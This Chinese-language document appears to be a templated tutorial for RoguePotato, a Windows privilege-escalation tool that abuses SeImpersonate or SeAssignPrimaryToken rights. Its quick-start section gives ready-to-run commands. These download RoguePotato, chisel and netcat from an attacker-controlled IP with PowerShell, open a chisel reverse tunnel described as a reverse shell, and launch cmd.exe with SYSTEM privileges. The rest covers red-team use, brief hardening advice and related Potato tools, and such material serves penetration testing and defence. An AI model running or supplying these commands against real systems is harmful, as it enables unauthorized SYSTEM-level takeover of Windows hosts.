RoguePotato 开源项目教程
项目介绍
RoguePotato 是一个用于 Windows 权限提升的工具,它利用 SeImpersonate
或 SeAssignPrimaryToken
权限来获取系统级别的执行权限。与 JuicyPotato 不同,RoguePotato 在 Windows Server 2019 上也能有效工作。该项目由 antonioCoco 开发,并在 GitHub 上开源。
项目快速启动
环境准备
- 目标系统:Windows Server 2019
- 工具下载:RoguePotato.exe, chisel.exe, nc64.exe
快速启动步骤
-
下载工具
powershell -c wget http://10.10.x.x:8080/RoguePotato.exe -outfile RoguePotato.exe powershell -c wget http://10.10.x.x:8080/chiselx64.exe -outfile chisel.exe powershell -c wget http://10.10.x.x:8080/nc64.exe -outfile nc64.exe
-
设置反向 shell
chisel.exe client 10.10.x.x:8080 R:9999:127.0.0.1:9999
-
运行 RoguePotato
RoguePotato.exe -r 10.10.x.x -e "C:\windows\system32\cmd.exe" -l 9999
应用案例和最佳实践
应用案例
RoguePotato 主要用于渗透测试中,特别是在需要从服务账户提升到系统账户权限的场景。例如,在红队演练中,攻击者可能需要利用此工具来获取更高的系统权限以执行关键操作。
最佳实践
- 安全配置:确保目标系统上的
SeImpersonate
或SeAssignPrimaryToken
权限被严格控制。 - 监控与日志:实施严格的系统监控和日志记录,以便及时发现和响应异常行为。
- 定期更新:保持系统和工具的最新状态,以防止已知漏洞被利用。
典型生态项目
相关项目
- JuicyPotato:一个类似的权限提升工具,但在 Windows Server 2019 上不再有效。
- PrintSpoofer:另一个权限提升工具,利用打印 spooler 服务的漏洞。
- SharpEfsPotato:结合了 EfsRpc 和 SeImpersonatePrivilege 的权限提升工具。
这些工具和项目共同构成了 Windows 权限提升领域的生态系统,为安全研究人员和渗透测试人员提供了丰富的资源。